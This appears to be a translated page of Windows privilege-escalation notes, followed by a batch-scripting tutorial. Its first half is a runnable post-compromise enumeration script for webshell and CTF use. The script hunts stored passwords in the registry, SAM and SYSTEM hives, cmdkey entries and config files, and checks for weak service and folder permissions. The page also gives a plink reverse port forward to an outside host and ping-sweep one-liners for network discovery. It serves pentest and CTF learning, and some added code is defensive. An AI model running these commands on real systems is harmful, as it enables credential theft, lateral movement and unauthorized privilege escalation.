Privilege escalation utilities

Batch traversal of the directories a webshell can reach

When PHP is restricted, the directory-traversal functions opendir, readdir, is_dir and is_writable lose their advantage for locating directories that allow execution, so a batch file is used instead.

@echo off
rem write the modification time, size and full path of every file under C:\ to list.txt
(For /r c:\ %%a in (*) do echo %%~ta %%~za %%~fa)>list.txt

Privilege escalation batch script

@echo off
set userprofile=%cd%
mode con:cols=160 lines=9999
cd c:\
echo ------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------
:: https://github.com/GDSSecurity/Windows-Exploit-Suggester
systeminfo
echo.
echo ----- Architecture -------
SET Processor
echo.
echo ------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------
:: Note, in CTF boxes it's not uncommon to see other low level users on the machine. It can be a temptation to want to always skip to Administrator, but sometimes it is essential that you elevate privileges to that of a different user first before being able to get admin rights. Once you get that user's rights, pay close attention to their user folder.
echo Current User: %username%
whoami /all
echo --- All users, accounts and groups ---
net users
net accounts
net localgroup
echo ------- Administrators --------
net localgroup administrators
echo ------- Environment Variables -------
set
echo.
echo ------- Additional Drives (if not run as part of a batch job replace double percent with single percent sign)--------
for %%i in (a b d e f g h i j k l m n o p q r s t u v w x y z) do @dir %%i: 2>nul
echo.
echo ---------------------------------------- Search for Quick Wins --------------------------------------
echo -------- Listing contents of user directories ---------
:: In CTF machines it is VERY common for there to be artifacts used for privilege escalation within user directories. Pay special attention for files that may contain credentials, or files that may be used as part of a scheduled task. You can typically ignore most default windows files (some of which have been filtered out as part of this script).
dir "C:\Users\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\"
dir "C:\Documents and Settings\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\"
echo.
echo -------- Exploring program directories and C:\ ---------
:: These directory listings are not recursive. They are meant to give you a general overview of the programs installed on the system. Searchsploit every (non default/windows) program version, and check each program config for creds.
echo --- Program Files ---
dir "C:\Program Files" /b
echo --- Program Files (x86) ---
dir "C:\Program Files (x86)" /b
echo --- Root of C:\ ----
dir "C:\" /b
echo.
echo --- Inetpub (any config files in here? May need to manually drill into this folder if it exists) ---
:: The root web folder can at times be extensive, and thus we do not always want to show a recursive listing of its contents in this script but it should always be investigated regardless.
dir /a /b C:\inetpub\
echo --- Broad search for Apache or Xampp ---
dir /s /b apache* xampp*
echo.
echo ---Search for Configuration and sensitive files---
echo -- Broad search for config files --
:: If the .NET framework is installed you will get a bunch of config files which are typically default and can be ignored. The more you practice priv esc. the more you'll learn which files can be ignored, and which you should give a closer eye to.
dir /s /b php.ini httpd.conf httpd-xampp.conf my.ini my.cnf web.config
echo -- Application Host File --
type C:\Windows\System32\inetsrv\config\applicationHost.config 2>nul
echo -- Broad search for unattend or sysprep files --
dir /b /s unattended.xml* sysprep.xml* sysprep.inf* unattend.xml*
echo -- Stored Passwords --
:: To use stored cmdkey credentials use runas with /savecred flag (e.g. runas /savecred /user:ACCESS\Administrator "ping 10.10.10.9")
cmdkey /list
echo.
echo -- Checking for any accessible SAM or SYSTEM files --
dir %SYSTEMROOT%\repair\SAM 2>nul
dir %SYSTEMROOT%\System32\config\RegBack\SAM 2>nul
dir %SYSTEMROOT%\System32\config\SAM 2>nul
dir %SYSTEMROOT%\repair\system 2>nul
dir %SYSTEMROOT%\System32\config\SYSTEM 2>nul
dir %SYSTEMROOT%\System32\config\RegBack\system 2>nul
dir /a /b /s SAM.b*
echo.
echo -- Broad search for vnc kdbx or rdp files --
dir /a /s /b *.kdbx *vnc.ini *.rdp
echo.
echo --- Searching Registry for Passwords ---
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query HKLM /f password /t REG_SZ /s /k
reg query HKCU /f password /t REG_SZ /s /k
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
echo.
echo --- AlwaysInstallElevated Check ---
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
echo.
echo --- Program Files and User Directories where everybody (or users) have full or modify permissions ---
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
icacls "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
echo.
echo ... performing same checks but using cacls instead of icacls (for older versions of Windows)...
cacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
cacls "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
echo.
echo ---Domain joined? If so check domain controller for GPP files ----
set user
echo.
cd %userprofile%
echo ---Unquoted Service Paths (requires that the directory from which this script is run is user writeable. If it is not, you can use the WMIC command below) ---
REM wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
sc query state= all > scoutput.txt
findstr "SERVICE_NAME:" scoutput.txt > Servicenames.txt
FOR /F "tokens=2 delims= " %%i in (Servicenames.txt) DO @echo %%i >> services.txt
FOR /F %%i in (services.txt) DO @sc qc %%i | findstr "BINARY_PATH_NAME" >> path.txt
find /v """" path.txt > unquotedpaths.txt
sort unquotedpaths.txt|findstr /i /v C:\WINDOWS
del /f Servicenames.txt
del /f services.txt
del /f path.txt
del /f scoutput.txt
del /f unquotedpaths.txt
echo.
echo --------------- AccessChk (checks permissions for Authenticated Users, Everyone, and Users)------------------
reg.exe ADD "HKCU\Software\Sysinternals\AccessChk" /v EulaAccepted /t REG_DWORD /d 1 /f
echo --- Accesschk World writeable folders and files ----
accesschk.exe -uwdqs "Users" c:\ /accepteula
accesschk.exe -uwdqs "Authenticated Users" c:\ /accepteula
accesschk.exe -qwsu "Everyone" * /accepteula
accesschk.exe -qwsu "Authenticated Users" * /accepteula
accesschk.exe -qwsu "Users" * /accepteula
echo.
echo --- Accesschk services with weak permissions ---
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
echo.
echo --- Accesschk services that we can change registry values for (such as ImagePath) ---
accesschk.exe -kvqwsu "Everyone" hklm\system\currentcontrolset\services /accepteula
accesschk.exe -kvqwsu "Authenticated Users" hklm\system\currentcontrolset\services /accepteula
accesschk.exe -kvqwsu "Users" hklm\system\currentcontrolset\services /accepteula
echo.
echo ---------------------------------------- End Search for Quick Wins --------------------------------------
cd c:\
echo ------- Powershell existence/version check -------
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
echo ------- Network shares -------
net share
echo ------- Programs that run at startup ------
:: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic
wmic startup get caption,command
echo -------- Path (is dll hijacking possible?) ------
echo Getting system + user path from command line (check permissions using cacls [path] or accesschk.exe -dqv [path])...
echo %path%
echo.
:: I couldn't find a way to only get system path in DOS (user path does not matter for the purpose of dll hijacking). If powershell is available you can use folderperm.ps1 script
:: https://github.com/ankh2054/windows-pentest/blob/master/Powershell/folderperms.ps1
:: powershell.exe -ExecutionPolicy Bypass -noLogo -Command "[Environment]::GetEnvironmentVariable('Path', [System.EnvironmentVariableTarget]::Machine)"
:: Or let the script do all the work for you
:: powershell.exe -executionpolicy bypass -file folderperm.ps1
echo ------- Scheduled Tasks Names Only -------
:: Look for any interesting/non-standard scheduled tasks, then view the scheduled task details list below to get a better idea of what that task is doing and who is running it.
schtasks /query /fo LIST 2>nul | findstr "TaskName"
echo.
echo ------- Scheduled Tasks Details (taskname, author, command run, run as user) -------
schtasks /query /fo LIST /v | findstr "TaskName Author: Run: User:"
echo.
echo ------- Services Currently Running (check for Windows Defender or Anti-virus) ---------
net start
echo.
echo ------- Link Running Processes to started services --------
tasklist /SVC
echo.
echo ------- Processes verbose output (who is running what?) --------
:: Pay close attention to this list. Especially for those tasks run by a user other than your own.
tasklist /v
echo.
echo ------- Patches (also listed as part of systeminfo) -------
:: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic
:: Systeminfo may at times fail to list all patches (instead showing 'file x' or something along those lines) in which case it's important to have this fallback.
wmic qfe get Caption,Description,HotFixID,InstalledOn
echo ------- Firewall ------
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall dump
echo ------ Network information ------
ipconfig /all
:: Routing and ARP tables accessible with these commands... uncomment if you wish, I didn't typically find them helpful for priv esc.
REM route print
REM arp -A
echo.
echo ------- Current connections and listening ports -------
:: Reverse port forward anything that is not accessible remotely, and run nmap on it. If SMB is available locally, do you have creds or hashes you can pass through it after port forwarding?
netstat -ano
echo.
echo ------- REVERSE PORT FORWARD MULTIPLE PORTS AT ONCE: plink.exe -l username -pw mysecretpassword -P [port] 10.11.0.108 -R 8080:127.0.0.1:8080 -R 8000:127.0.0.1:8000 -R 443:127.0.0.1:443 ------------
echo.
echo --- Broad search for any possible config files which may contain passwords ---
:: The following broad config file and credential searches could result in many results. They are meant as a fall back once you have already done thorough enumeration of user directories, web directories, and program directories (in addition to having pillaged the db).
dir /s /b *pass* *cred* *vnc* *.config*
echo.
echo --- Starting broad search in the background for any files with the word password in it. Press enter to get status occasionally --
start /b findstr /sim password *.xml *.ini *.txt *.config *.bak 2>nul
echo.

Windows commands

IPs connected to port 3389

netstat -an
netstat -an | find "3389"

System information

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Firewall status

netsh firewall show state

netsh firewall show config

Scheduled tasks

schtasks /query /fo LIST /v

Using WMIC

Script: http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar

Sample output: http://www.fuzzysecurity.com/tutorials/files/Win7.html

Fileless scanning

Ping a whole /24 (class C) range and print only the hosts that respond.

for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl"

Domain machines and their IPs

Ping every host listed by net view and print the machine name and IP address.

FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)

Finding host names

for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Pinging"

Searching a /16 (class B) range

for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"

Windows 7

for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Pinging"
for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"

Change these to

for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Ping"
for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Ping"

to make them work on Windows 7 as well (on Windows 7 the keyword in the ping -a output is "Ping").

Also

findstr /i "pinging" or findstr /i "ping" can be replaced with findstr "[", which works regardless of the system language.

Batch scripting tutorial

1. Iterating over the files in a directory

1.1 Command explanation

Command: for [option] %%variable in (pattern) do (command)

Remember: every element must be separated by a space; there is a space between in and (, and a space between do and (, otherwise the command fails to run.

Note: this section only covers using the for command in a batch script to iterate over a directory, so the other meanings of each element are not discussed below.

[]: the element is optional

[option]: there are four options, /d, /r, /l and /f; together with the no-option form that makes five cases

  • no option: iterates over the files in the current directory; a path may also be given in (pattern)
  • /d: iterates over the subdirectories of the current directory; a path may also be given in (pattern)
  • /r [path]: recursively iterates over all files under the given path, including files in subdirectories; if no path is given, the current directory is used
  • /l: must be combined with (pattern); the parentheses then take the form (start, step, end), and the for command behaves like a for statement in Java
  • /f: parses the contents of a file; not covered in this section

%%variable: plays the role of int i = 0 in for(int i = 0; ; ). The difference is that when a batch for loop iterates over the items, %%variable is each item itself, i.e. %%variable already refers to the concrete item.

(pattern): the content of the parentheses after in may be a wildcard that filters the files in the directory by a rule, e.g. (*.txt) iterates over all files ending in .txt

(command): the preceding elements obtain each item in the directory; what to do with each item is written here, similar to the {} body after a Java for statement

1.2 Usage examples

The following examples are based on the file paths shown in the figure above; the batch script is test.bat

  • no option: for %%i in (*) do ( echo %%i )

Effect: iterates over all files in the current directory

  • no option, with a path: for %%i in (c:\softwares\VisualBat\*.url) do ( echo %%i )

Effect: iterates over the files ending in .url under the path given in (pattern)

  • with /d: for /d %%i in (*) do ( echo %%i )

Effect: iterates over all subdirectories of the current directory

  • with /d and a path: for /d %%i in (c:\softwares\VisualBat\*) do ( echo %%i )

Effect: iterates over all subdirectories of the given directory; %%i holds the absolute path of each subdirectory

  • with /r: for /r %%i in (*.url) do ( echo %%i )

Effect: recursively iterates over all files ending in .url under the current path; because the traversal is recursive, %%i holds the absolute path of each file

  • with /r and a path: for /r c:\softwares\VisualBat\ %%i in (*.url) do ( echo %%i )

Effect: same as in the figure above

  • with /l: for /l %%i in (1, 1, 5) do ( echo %%i )

Effect: equivalent to for (int i = 1; i <= 5; i++) in Java; the start value, the step (positive or negative) and the end value can all be chosen freely

  • with /d /r: for /d /r %%i in (*) do ( echo %%i )

Effect: options can be combined; /d iterates over directories and /r makes the traversal recursive, so the command above recursively iterates over all directories under the current one, including those inside subdirectories

2. Using temporary variables

2.1 Basic variable usage

Command: set key=value

Remember: there must be no spaces between key, = and value; do not add spaces to mimic Java style, as this is unlike Java's int a = 1 declaration.

Using a variable: %key%

Example

@echo off
set name=dasuAndroidTv
echo %name%

Effect: name can be used as a temporary variable; to reference it, wrap the name in percent signs

Limitation: a variable cannot be declared and used directly inside a for command as above, for example:

@echo off
for /l %%i in (0,1,5) do (
set name=dasuAndroidTv
echo %name%
)

Effect: declaring a temporary variable inside a for command and using it directly via %key% produces the error shown in the figure above ("ECHO is off."). But if the set key=value declaration is placed outside the for command and the variable is only read inside it, it works, as follows:

@echo off
set name=dasuAndroidTv
for /l %%i in (0,1,5) do (
echo %name%
)

Effect: declaring the temporary variable outside the for command and only reading it inside is allowed

2.2 Using variables inside a for command

Question: what if a temporary variable must be declared inside the for command and then used there?

Using temporary variables inside a for command:

  1. Enable delayed expansion with the command: setlocal enabledelayedexpansion
  2. Inside the for command, reference the variable as !key! (with exclamation marks) instead of %key%
  3. Reason: unknown; this is the solution found on Google. If you are interested, search for it yourself.

Example

@echo off
setlocal enabledelayedexpansion
set name=dasu
for /l %%i in (0, 1, 5) do (
set name=dasuAndroidTv
echo !name!
echo %name%
)

Effect: put plainly, a temporary variable read via %name% inside a for command always yields the value it was given outside the for command; even if set reassigns it inside the for command, the change does not take effect.

So if a temporary variable assigned with set inside a for command needs to be used right away, two steps are required: first, enable delayed expansion at the start of the file with setlocal enabledelayedexpansion; second, reference the variable inside the for command as !name!.

3. String handling

3.1 Substrings

Command: %key:~[start,num]%

Explanation: when :~ appears inside %key%, the string key refers to is sliced; the following forms are supported:

  • n characters from a given position: %key:~0,4% takes the 4 characters starting at index 0
  • the rest of the string from a given position: %key:~4% takes the whole string starting at index 4
  • the rest of the string from a position counted from the end: %key:~-2% takes the whole string starting at the 2nd character from the end
  • n characters from a position counted from the end: %key:~-4,2% takes the 2 characters starting at the 4th character from the end
  • positive and negative positions combined: %key:~2,-2% takes the string from index 2 up to the 2nd character from the end

Example

@echo off
rem (rem marks a comment, like // in Java) the original string
set name=dasuAndroidTv
rem the 4 characters starting at index 0, prints dasu
echo %name:~0,4%
rem the whole string starting at index 4, prints AndroidTv
echo %name:~4%
rem the whole string starting at the 2nd character from the end, prints Tv
echo %name:~-2%
rem from index 4 up to the 2nd character from the end, prints Android
echo %name:~4,-2%
rem the 2 characters starting at the 4th character from the end, prints id
echo %name:~-4,2%

3.2 Concatenation

Command: %key1%%key2%

Explanation: simply place the string to append right after the other one; no concatenation operator is needed

Example

@echo off
set name1=dasu
set name2=AndroidTv
echo %name1%%name2%
rem comment: prints dasuAndroidTv

3.3 Replacement

Command: %key:old=new%

Explanation: no explanation needed; the example makes it clear

Example

@echo off
set name=whoAndroidTv
echo %name:who=dasu%
rem comment: prints dasuAndroidTv

3.4 Special file operations

When a for command iterates over the files in a directory, a set of modifiers gives access to various pieces of information about each file. See the example:

@echo off
for %%i in (*.txt) do (
echo %%i
echo %%~fi
echo %%~di
echo %%~pi
echo %%~ni
echo %%~xi
echo %%~ti
echo %%~zi
)

Explanation: when iterating over files with for, the content of %%i depends on how for is used; see section 1. In the usage above, %%i refers to each file name in the current directory, i.e. the complete file name.

These modifiers can then be used to obtain information about the file, for example:

  • %%~fi: the absolute path of the file
  • %%~di: the drive letter the file is on
  • %%~pi: the path of the file, without the drive letter
  • %%~ni: the file name without the extension
  • %%~xi: the file extension
  • %%~ti: the last modification time of the file
  • %%~zi: the size of the file
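As an added example that is not part of the original post, the script below combines the for /r traversal of section 1, the modifiers of section 3.4 and the delayed expansion of section 2.2 to summarize a directory tree rather than just echoing each value; the directory (first argument, defaulting to the current one) is an assumption.

```batch
@echo off
rem Added example (not from the original post): walk a directory tree with
rem for /r, use the %%~z / %%~x / %%~f modifiers from section 3.4 and the
rem delayed expansion from section 2.2 to count files, sum their sizes and
rem remember the largest file. The target directory is an assumption; pass
rem another one as the first argument.
setlocal enabledelayedexpansion
set "root=%~1"
if "%root%"=="" set "root=%cd%"

set /a count=0
set /a total=0
set /a maxsize=0
set "maxfile="
set /a bat=0

for /r "%root%" %%i in (*) do (
    rem %%~zi is the size in bytes. The counters must be read with !var!
    rem because %var% would be expanded once, before the loop starts.
    rem set /a works on 32-bit signed values, so totals above 2 GB overflow.
    set /a count+=1
    set /a total+=%%~zi
    if %%~zi gtr !maxsize! (
        set /a maxsize=%%~zi
        set "maxfile=%%~fi"
    )
    rem %%~xi is the extension, compared case-insensitively
    if /i "%%~xi"==".bat" set /a bat+=1
)

echo Directory : %root%
echo Files     : !count!
echo Total size: !total! bytes
echo .bat files: !bat!
if defined maxfile echo Largest   : !maxfile! (!maxsize! bytes)
endlocal
```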

3.5 Taking the part of a string before a given character

Most other languages offer an indexOf-style method for strings; in batch, a for statement can be used to process the string and achieve the same effect.

Example:

set name=woshidasusu_android
for /f "delims=_" %%i in ('echo %name%') do (
echo %%i
)

Output: woshidasusu

References
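As an added example (not from the original post or the scripts it reproduces), this script applies the for /f delims technique of this section and the replace syntax of section 3.3 to the unquoted service path check that the enumeration script above performs with temporary files, and prints the sc config command an administrator would use to quote each path; the service-name parsing (first word after SERVICE_NAME:) and the C:\Windows exclusion are assumptions taken from that script.

```batch
@echo off
rem Added example (not from the original post): reads each service's
rem BINARY_PATH_NAME with for /f (section 3.5), removes quotes and spaces
rem with the replace syntax of section 3.3, and reports services whose path
rem contains spaces but no quotes so that an administrator can quote them.
rem Paths whose only spaces separate command-line arguments are reported
rem too and need a manual look before the fix is applied.
setlocal enabledelayedexpansion
set /a found=0

rem tokens=2 takes the first word after "SERVICE_NAME:", as the script above does
for /f "tokens=2" %%s in ('sc query state^= all ^| findstr "SERVICE_NAME:"') do (
    for /f "tokens=1,* delims=:" %%k in ('sc qc "%%s" ^| findstr /i "BINARY_PATH_NAME"') do (
        rem %%l is everything after the first colon, with one leading space
        set "bin=%%l"
        set "bin=!bin:~1!"
        call :inspect "%%s"
    )
)

echo.
echo !found! service(s) with an unquoted path containing spaces
endlocal
exit /b 0

:inspect
rem remove every quote character; if nothing changed, the path is unquoted
set "noquote=!bin:"=!"
if not "!noquote!"=="!bin!" exit /b 0
rem remove every space; if nothing changed, the path has no spaces
set "nospace=!bin: =!"
if "!nospace!"=="!bin!" exit /b 0
rem services under C:\Windows are skipped, mirroring the enumeration script
if /i "!bin:~0,10!"=="C:\Windows" exit /b 0
set /a found+=1
echo [UNQUOTED] %~1: !bin!
rem sc config strips the outer quotes, so the embedded \" pair is what makes
rem the stored image path quoted
echo            fix: sc config "%~1" binPath= "\"!bin!\""
exit /b 0
```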

https://www.cnblogs.com/dasusu/p/9058554.html

http://www.fuzzysecurity.com/tutorials/16.html

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

https://github.com/frizb/Windows-Privilege-Escalation
